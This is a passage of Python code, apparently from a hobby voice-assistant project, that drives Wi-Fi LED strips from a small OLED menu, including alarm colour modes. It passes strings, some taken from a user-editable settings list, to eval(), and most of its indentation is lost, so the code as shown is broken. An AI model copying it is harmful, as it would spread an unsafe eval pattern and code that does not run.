memy = memy - 12
selist[0] = 51
else:
if seraselect[1]:
hkhkk = []
for leter in namegf:
hkhkk.append(leter)
hkhkk[len(hkhkk)-1] = Myassistant.ad_letter(hkhkk[len(hkhkk)-1],1)
namegf = "".join(hkhkk)
else:
if not seraselect[0]+1 > 20:
namegf = namegf+' '
seraselect[0] = len(namegf)-1
elif self.buton[0] == 3 :
del self.buton[0]
if hresqtr:
selist = [selist[0] - 12,selist[1] - 1]
if selist[1] < 0:
selist = [15, 0]
elif selist[0] < 14 :
memy = memy + 12
selist[0] = 15
else:
if seraselect[1]:
hkhkk = []
for leter in namegf:
hkhkk.append(leter)
hkhkk[len(hkhkk)-1] = Myassistant.remove_letter(hkhkk[len(hkhkk)-1],1)
namegf = "".join(hkhkk)
else:
if not seraselect[0]-1 < 0:
hkhkk = []
for leter in namegf:
hkhkk.append(leter)
del hkhkk[len(hkhkk)-1]
namegf = "".join(hkhkk)
seraselect[0] = seraselect[0]-1
else:
namegf = ""
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
x = 2
if not listaff == [] and hresqtr:
if len(listaff[selist[1]]) * 6 > 124 :
buton = buton - 1
if choice:
return None
else:
return response
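    # LED-strip picker used while creating a bulb alarm. The current colours
    # of every strip are saved, the user previews a mode on the real bulbs
    # (on/off, a named colour, a preset pattern with speed, or a sunrise /
    # sunset fade with start/end level and delay), then the saved colours are
    # restored. Returns [address or list of addresses, LedTimer mode string]
    # such as 'setModeColor(r,g,b)' or 'setModeSunrise(start,end,delay)',
    # ready to be applied with eval() by the alarm code.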
def select_led_strip_color_alarm(self):
try:
response = None
ifwantreload = 0
cont = True
name = 'All'
listwifi={}
name_wifi_led = []
ip_wifi_led = []
led = flux_led.__main__
for wifi_led in settings.get('Led strips names'):
listwifi[str(wifi_led[0])]=led.WifiLedBulb(wifi_led[1])
name_wifi_led.append(wifi_led[0])
ip_wifi_led.append(wifi_led[1])
colorlist = ['seven color cross fade','red gradual change','green gradual change','blue gradual change','yellow gradual change','cyan gradual change','purple gradual change','white gradual change','red green cross fade','red blue cross fade','green blue cross fade','seven color strobe flash','red strobe flash','green strobe flash','blue strobe flash','yellow strobe flash','cyan strobe flash','purple strobe flash','white strobe flash','seven color jumping']
coloraction = ['setPresetPattern(0x25,100)','setPresetPattern(0x26,100)','setPresetPattern(0x27,100)','setPresetPattern(0x28,100)','setPresetPattern(0x29,100)','setPresetPattern(0x2a,100)','setPresetPattern(0x2b,100)','setPresetPattern(0x2c,100)','setPresetPattern(0x2d,100)','setPresetPattern(0x2e,100)','setPresetPattern(0x2f,100)','setPresetPattern(0x30,100)','setPresetPattern(0x31,100)','setPresetPattern(0x32,100)','setPresetPattern(0x33,100)','setPresetPattern(0x34,100)','setPresetPattern(0x35,100)','setPresetPattern(0x36,100)','setPresetPattern(0x37,100)','setPresetPattern(0x38,100)']
selectlist = round((len(colorlist) - 1) / 2)
selection = [False, 0]
save_list_color = []
for adresr in listwifi:
                wifiled = listwifi[adresr]
y = wifiled.getRgbw()
save_list_color.append([int(y[0]),int(y[1]),int(y[2]),int(y[3]),wifiled.is_on])
r = 0
g = 0
b = 0
w = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
if not wifiled.isOn():
wifiled.turnOn()
while cont and not self.al:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if name == 'All':
r = 0
g = 0
b = 0
w = 0
ison = False
brightnes = 0
i = 0
for adress in listwifi:
wifiled = listwifi[adress]
wifiled.refreshState()
y = wifiled.getRgbw()
r = r + y[0]
g = g + y[1]
b = b + y[2]
w = w + y[3]
if wifiled.is_on:
ison = True
brightnes = brightnes + wifiled.brightness
i = i + 1
r = round(r/i)
g = round(g/i)
b = round(b/i)
w = round(w/i)
brightnes = round(brightnes/i)
else:
wifiled = listwifi[name]
wifiled.refreshState()
y = wifiled.getRgbw()
r = y[0]
g = y[1]
b = y[2]
w = y[3]
ison = wifiled.is_on
brightnes = wifiled.brightness
brightnessim = Image.open('~/google-assistant/src/images/led_strip/brightness.jpg')
brightnessim = brightnessim.resize((17,17))
brightnessim = ImageOps.invert(brightnessim)
image.paste(brightnessim, (28,12))
if selection[1] == 4:
sunrise = Image.open('~/google-assistant/src/images/led_strip/sunrise.png')
sunrise = sunrise.resize((15,13))
sunrise = ImageOps.invert(sunrise)
image.paste(sunrise, (111,11))
draw.rectangle((111, 8, 124, 14), outline=0, fill=0)
draw.line((109,15,109,25), fill=255)
draw.line((109,25,127,25), fill=255)
draw.line((127,15,127,25), fill=255)
draw.line((109,15,127,15), fill=255)
else:
sunrise = Image.open('~/google-assistant/src/images/led_strip/sunrise.png')
sunrise = sunrise.resize((15,13))
sunrise = ImageOps.invert(sunrise)
image.paste(sunrise, (111,11))
draw.rectangle((111, 8, 126, 15), outline=0, fill=0)
draw.text(((127 - (len(name) * 6)) / 2,0), name, font=font, fill=225)
if ison:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'on', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'on', font=font, fill=225)
else:
draw.text((2,15), 'on', font=font, fill=225)
else:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'off', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'off', font=font, fill=225)
else:
draw.text((2,15), 'off', font=font, fill=225)
if selection[1] == 1:
if selection[0]:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=255)
draw.text((46,15), str(brightnes), font=font, fill=0)
else:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=0)
draw.text((46,15), str(brightnes), font=font, fill=225)
else:
draw.text((46,15), str(brightnes), font=font, fill=225)
if selection[1] == 2:
draw.rectangle((74, 15, 88, 25), outline=255, fill=0)
draw.line((76,17,86,17), fill=255)
draw.line((76,19,86,19), fill=255)
draw.line((76,21,86,21), fill=255)
draw.line((76,23,86,23), fill=255)
if selection[1] == 3:
draw.rectangle((96, 15, (len(str('+')) * 6) + 98, 25), outline=255, fill=0)
draw.text((98,15), '+', font=font, fill=225)
xcenter = (127 - (len(colorlist[selectlist]) * 6)) / 2
if selection[1] == 5:
draw.rectangle((0, 29, 127, 48), outline=255, fill=0)
if selection[0]:
draw.rectangle((xcenter - 4, 31, (len(colorlist[selectlist]) * 6) + xcenter + 3, 46), outline=255, fill=0)
i = selectlist - 1
while i > -1:
xcenter = xcenter - (12 + (len(colorlist[i]) * 6))
i = i - 1
draw.text((xcenter,33), " ".join(colorlist), font=font, fill=225)
if selection[1] == 6:
if selection[0]:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=255)
draw.text((10,53), str(r), font=font, fill=0)
else:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=0)
draw.text((10,53), str(r), font=font, fill=225)
draw.text((0,53), 'R', font=font, fill=225)
else:
draw.text((0,53), 'R:', font=font, fill=225)
draw.text((10,53), str(r), font=font, fill=225)
if selection[1] == 7:
if selection[0]:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=255)
draw.text((42,53), str(g), font=font, fill=0)
else:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=0)
draw.text((42,53), str(g), font=font, fill=225)
draw.text((32,53), 'G', font=font, fill=225)
else:
draw.text((32,53), 'G:', font=font, fill=225)
draw.text((42,53), str(g), font=font, fill=225)
if selection[1] == 8:
if selection[0]:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=255)
draw.text((74,53), str(b), font=font, fill=0)
else:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=0)
draw.text((74,53), str(b), font=font, fill=225)
draw.text((64,53), 'B', font=font, fill=225)
else:
draw.text((64,53), 'B:', font=font, fill=225)
draw.text((74,53), str(b), font=font, fill=225)
if selection[1] == 9:
if selection[0]:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=255)
draw.text((106,53), str(w), font=font, fill=0)
else:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=0)
draw.text((106,53), str(w), font=font, fill=225)
draw.text((96,53), 'W', font=font, fill=225)
else:
draw.text((96,53), 'W:', font=font, fill=225)
draw.text((106,53), str(w), font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
cont = False
buton = 0
elif self.buton[0] == 1 :
del self.buton[0]
if selection[1] == 2:
ledsearchaff = [['All','All']]
for sdna in name_wifi_led:
ledsearchaff.append([str(sdna),str(sdna)])
name = Myassistant.select_list(self,ledsearchaff,'select led strip')
if name == None:
name = 'All'
elif selection[1] == 3:
jgiush = []
responscoled = flux_led.utils.get_color_names_list()
for tey in responscoled:
jgiush.append([tey,tey])
efdgk = Myassistant.select_search_list(self,jgiush)
if not efdgk == None:
resultintero = flux_led.utils.color_object_to_tuple(efdgk)
                                    if name == 'All':
                                        for adress in listwifi:
                                            wifiled = listwifi[adress]
                                            wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
                                    else:
                                        wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
response = None
elif selection[1] == 4:
choicoco = Myassistant.select_list(self,[['Sunset','sunset'],['Sunrise','sunrise'],['Exit','exit']],'choice')
delay = Myassistant.select_cursor(self,30,0,1,1,"'",'delay')
if choicoco == 'sunset':
start = Myassistant.select_cursor(self,100,0,5,100,"%",'start')
stop = Myassistant.select_cursor(self,100,0,5,0,"%",'end')
response = choicoco+','+str(start)+','+str(stop)+','+str(delay)
elif choicoco == 'sunrise':
start = Myassistant.select_cursor(self,100,0,5,0,"%",'start')
stop = Myassistant.select_cursor(self,100,0,5,100,"%",'end')
response = choicoco+','+str(start)+','+str(stop)+','+str(delay)
elif selection[1] == 5:
if not selection[0]:
selection[0] = not selection[0]
if name == 'All':
for adress in listwifi:
wifiled = listwifi[adress]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
selection[0] = not selection[0]
speed = Myassistant.select_cursor(self,100,0,5,100,"",'speed')
ffgghhfg = str(coloraction[selectlist]).replace(',100)',','+str(speed)+')')
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + ffgghhfg)
except:
print('Failed to execute : "' + ffgghhfg + '"')
else:
try:
eval('wifiled.' + ffgghhfg)
except:
print('Failed to execute : "' + ffgghhfg + '"')
response = ffgghhfg
ifwantreload = 0
else:
selection[0] = not selection[0]
elif self.buton[0] == 2 :
del self.buton[0]
if selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
else:
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness+10)
else:
if brightnes+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes+10)
response = None
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]+10 > 255 :
wifiled.setRgbw(r=255,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]+10,g=y[1],b=y[2],w=y[3])
else:
if r+10 > 255:
wifiled.setRgbw(r=255,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r+10,g=g,b=b,w=w)
response = None
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]+10 > 255 :
wifiled.setRgbw(r=y[0],g=255,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]+10,b=y[2],w=y[3])
else:
if g+10 > 255:
wifiled.setRgbw(r=r,g=255,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g+10,b=b,w=w)
response = None
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=255,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]+10,w=y[3])
else:
                                        if b+10 > 255:
wifiled.setRgbw(r=r,g=g,b=255,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b+10,w=w)
response = None
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]+10)
else:
if w+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w+10)
response = None
elif selection[1] == 5:
if not selectlist + 1 > len(colorlist)-1:
selectlist = selectlist + 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
if not selection[1] + 1 > 9:
selection[1] = selection[1] + 1
else:
selection[1] = 0
elif self.buton[0] == 3 :
del self.buton[0]
if selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
else:
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness-10)
else:
if brightnes-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes-10)
response = None
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]-10 < 0 :
wifiled.setRgbw(r=0,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]-10,g=y[1],b=y[2],w=y[3])
else:
if r-10 < 0:
wifiled.setRgbw(r=0,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r-10,g=g,b=b,w=w)
response = None
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]-10 < 0 :
wifiled.setRgbw(r=y[0],g=0,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]-10,b=y[2],w=y[3])
else:
if g-10 < 0:
wifiled.setRgbw(r=r,g=0,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g-10,b=b,w=w)
response = None
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=0,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]-10,w=y[3])
else:
if b-10 < 0:
wifiled.setRgbw(r=r,g=g,b=0,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b-10,w=w)
response = None
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]-10)
else:
if w-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w-10)
response = None
elif selection[1] == 5:
if not selectlist - 1 < 0:
selectlist = selectlist - 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
if not selection[1] - 1 < 0:
selection[1] = selection[1] - 1
else:
selection[1] = 9
ifwantreload = 0
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
self.veil = 0
buton = buton - 1
resoul = ['','']
if name == 'All':
resoul[0] = []
for adress in ip_wifi_led:
resoul[0].append(adress)
else:
resoul[0] = ip_wifi_led[name_wifi_led.index(name)]
if response == 'turnOn()':
resoul[1] = 'setModeDefault()'
elif response == 'turnOff()':
resoul[1] = 'setModeTurnOff()'
elif 'sunset' in str(response):
ret = response.split(',')
resoul[1] = 'setModeSunset('+str(ret[1])+','+str(ret[2])+','+str(ret[3])+')'
elif 'sunrise' in str(response):
ret = response.split(',')
resoul[1] = 'setModeSunrise('+str(ret[1])+','+str(ret[2])+','+str(ret[3])+')'
elif 'setPresetPattern' in str(response):
kdkd = response.split(',')
shemode = kdkd[0].replace('setPresetPattern(','')
spedmode = kdkd[1].replace(')','')
resoul[1] = 'setModePresetPattern('+str(shemode)+','+str(spedmode)+')'
else:
if name == 'All':
r = 0
g = 0
b = 0
w = 0
i = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
r = r + y[0]
g = g + y[1]
b = b + y[2]
w = w + y[3]
i = i + 1
r = round(r/i)
g = round(g/i)
b = round(b/i)
w = round(w/i)
else:
wifiled = listwifi[name]
y = wifiled.getRgbw()
r = y[0]
g = y[1]
b = y[2]
w = y[3]
if w == 0:
resoul[1] = 'setModeColor('+str(r)+','+str(g)+','+str(b)+')'
else:
resoul[1] = 'setModeWarmWhite('+str(w)+')'
i = len(save_list_color) - 1
while i > -1:
wifiled = led.WifiLedBulb(ip_wifi_led[i])
if save_list_color[i][4]:
wifiled.turnOn()
wifiled.setRgbw(r=save_list_color[i][0],g=save_list_color[i][1],b=save_list_color[i][2],w=save_list_color[i][3])
else:
wifiled.turnOff()
i = i - 1
return resoul
except BrokenPipeError:
self.veil = 0
print('Failed : "led strip"')
resoul = ['','']
resoul[0] = []
for adress in ip_wifi_led:
resoul[0].append(adress)
resoul[1] = 'setModeDefault()'
return resoul
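# Note on the return value (descriptive comment added for clarity): the method
# above and select_led_strip_color_all() below both return `resoul`, a
# two-element list. resoul[0] is either the list of every strip IP (when
# name == 'All') or the single selected strip's IP. resoul[1] is an action
# string such as 'setModeDefault()', 'setModeTurnOff()' or 'setModeColor(r,g,b)'
# here, or a raw 'setRgb(...)' / 'setRgbw(...)' call in the method below, which
# the caller (outside this excerpt) presumably dispatches.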
def select_led_strip_color_all(self):
try:
response = None
ifwantreload = 0
cont = True
name = 'All'
listwifi={}
ip_wifi_led=[]
name_wifi_led = []
led = flux_led.__main__
for wifi_led in settings.get('Led strips names'):
listwifi[str(wifi_led[0])]=led.WifiLedBulb(wifi_led[1])
name_wifi_led.append(wifi_led[0])
ip_wifi_led.append(wifi_led[1])
colorlist = []
coloraction = []
for color in settings.get('Custom colors'):
colorlist.append(color[0])
coloraction.append(color[1])
selectlist = round((len(colorlist) - 1) / 2)
selection = [False, 0]
save_list_color = []
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
save_list_color.append([int(y[0]),int(y[1]),int(y[2]),int(y[3]),wifiled.is_on])
r = 0
g = 0
b = 0
w = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
if not wifiled.isOn():
wifiled.turnOn()
while cont and not self.al:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if name == 'All':
r = 0
g = 0
b = 0
w = 0
ison = False
brightnes = 0
i = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
wifiled.refreshState()
y = wifiled.getRgbw()
r = r + y[0]
g = g + y[1]
b = b + y[2]
w = w + y[3]
if wifiled.is_on:
ison = True
brightnes = brightnes + wifiled.brightness
i = i + 1
r = round(r/i)
g = round(g/i)
b = round(b/i)
w = round(w/i)
brightnes = round(brightnes/i)
else:
wifiled = listwifi[name]
wifiled.refreshState()
y = wifiled.getRgbw()
r = y[0]
g = y[1]
b = y[2]
w = y[3]
ison = wifiled.is_on
brightnes = wifiled.brightness
brightnessim = Image.open('~/google-assistant/src/images/led_strip/brightness.jpg')
brightnessim = brightnessim.resize((17,17))
brightnessim = ImageOps.invert(brightnessim)
image.paste(brightnessim, (28,12))
draw.text(((127 - (len(name) * 6)) / 2,0), name, font=font, fill=225)
if ison:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'on', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'on', font=font, fill=225)
else:
draw.text((2,15), 'on', font=font, fill=225)
else:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'off', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'off', font=font, fill=225)
else:
draw.text((2,15), 'off', font=font, fill=225)
if selection[1] == 1:
if selection[0]:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=255)
draw.text((46,15), str(brightnes), font=font, fill=0)
else:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=0)
draw.text((46,15), str(brightnes), font=font, fill=225)
else:
draw.text((46,15), str(brightnes), font=font, fill=225)
if selection[1] == 2:
draw.rectangle((74, 15, 88, 25), outline=255, fill=0)
draw.line((76,17,86,17), fill=255)
draw.line((76,19,86,19), fill=255)
draw.line((76,21,86,21), fill=255)
draw.line((76,23,86,23), fill=255)
if selection[1] == 3:
draw.rectangle((108, 15, (len(str('+')) * 6) + 110, 25), outline=255, fill=0)
draw.text((110,15), '+', font=font, fill=225)
xcenter = (127 - (len(colorlist[selectlist]) * 6)) / 2
if selection[1] == 5:
draw.rectangle((0, 29, 127, 48), outline=255, fill=0)
if selection[0]:
draw.rectangle((xcenter - 4, 31, (len(colorlist[selectlist]) * 6) + xcenter + 3, 46), outline=255, fill=0)
i = selectlist - 1
while i > -1:
xcenter = xcenter - (12 + (len(colorlist[i]) * 6))
i = i - 1
draw.text((xcenter,33), " ".join(colorlist), font=font, fill=225)
if selection[1] == 6:
if selection[0]:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=255)
draw.text((10,53), str(r), font=font, fill=0)
else:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=0)
draw.text((10,53), str(r), font=font, fill=225)
draw.text((0,53), 'R', font=font, fill=225)
else:
draw.text((0,53), 'R:', font=font, fill=225)
draw.text((10,53), str(r), font=font, fill=225)
if selection[1] == 7:
if selection[0]:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=255)
draw.text((42,53), str(g), font=font, fill=0)
else:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=0)
draw.text((42,53), str(g), font=font, fill=225)
draw.text((32,53), 'G', font=font, fill=225)
else:
draw.text((32,53), 'G:', font=font, fill=225)
draw.text((42,53), str(g), font=font, fill=225)
if selection[1] == 8:
if selection[0]:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=255)
draw.text((74,53), str(b), font=font, fill=0)
else:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=0)
draw.text((74,53), str(b), font=font, fill=225)
draw.text((64,53), 'B', font=font, fill=225)
else:
draw.text((64,53), 'B:', font=font, fill=225)
draw.text((74,53), str(b), font=font, fill=225)
if selection[1] == 9:
if selection[0]:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=255)
draw.text((106,53), str(w), font=font, fill=0)
else:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=0)
draw.text((106,53), str(w), font=font, fill=225)
draw.text((96,53), 'W', font=font, fill=225)
else:
draw.text((96,53), 'W:', font=font, fill=225)
draw.text((106,53), str(w), font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
cont = False
buton = 0
elif self.buton[0] == 1 :
del self.buton[0]
if selection[1] == 2:
ledsearchaff = [['All','All']]
for sdna in name_wifi_led:
ledsearchaff.append([str(sdna),str(sdna)])
name = Myassistant.select_list(self,ledsearchaff,'select led strip')
if name == None:
name = 'All'
elif selection[1] == 3:
ffgddsj = Myassistant.select_list(self,[['Colors','color'],['Preset pattern','pattern'],['Exit','exit']],'choice')
if ffgddsj == 'pattern':
fgcolorpatname = ['seven color cross fade','red gradual change','green gradual change','blue gradual change','yellow gradual change','cyan gradual change','purple gradual change','white gradual change','red green cross fade','red blue cross fade','green blue cross fade','seven color strobe flash','red strobe flash','green strobe flash','blue strobe flash','yellow strobe flash','cyan strobe flash','purple strobe flash','white strobe flash','seven color jumping']
fgcolorpat = ['setPresetPattern(0x25,100)','setPresetPattern(0x26,100)','setPresetPattern(0x27,100)','setPresetPattern(0x28,100)','setPresetPattern(0x29,100)','setPresetPattern(0x2a,100)','setPresetPattern(0x2b,100)','setPresetPattern(0x2c,100)','setPresetPattern(0x2d,100)','setPresetPattern(0x2e,100)','setPresetPattern(0x2f,100)','setPresetPattern(0x30,100)','setPresetPattern(0x31,100)','setPresetPattern(0x32,100)','setPresetPattern(0x33,100)','setPresetPattern(0x34,100)','setPresetPattern(0x35,100)','setPresetPattern(0x36,100)','setPresetPattern(0x37,100)','setPresetPattern(0x38,100)']
collen = 0
mixcolornamepat = []
while collen < len(fgcolorpatname):
mixcolornamepat.append([str(fgcolorpatname[collen]),str(fgcolorpat[collen])])
collen = collen + 1
presety = Myassistant.select_list(self,mixcolornamepat,'preset pattern')
if not presety == None:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
eval('wifiled.' + str(presety))
else:
eval('wifiled.' + str(presety))
speed = Myassistant.select_cursor(self,100,0,5,100,"",'speed')
presety = str(presety).replace(',100)',','+str(speed)+')')
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
eval('wifiled.' + str(presety))
else:
eval('wifiled.' + str(presety))
response = str(presety)
elif ffgddsj == 'color':
jgiush = []
responscoled = flux_led.utils.get_color_names_list()
for tey in responscoled:
jgiush.append([tey,tey])
fdlghfdh = Myassistant.select_search_list(self,jgiush)
if not fdlghfdh == None:
resultintero = flux_led.utils.color_object_to_tuple(fdlghfdh)
if name == 'All':
    for adresr in listwifi:
        wifiled = listwifi[adresr]
        wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
else:
    wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
response = None
elif selection[1] == 5:
if not selection[0]:
selection[0] = not selection[0]
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
selection[0] = not selection[0]
ifwantreload = 0
else:
selection[0] = not selection[0]
elif self.buton[0] == 2 :
del self.buton[0]
if selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
else:
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness+10)
else:
if brightnes+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=255)
else:
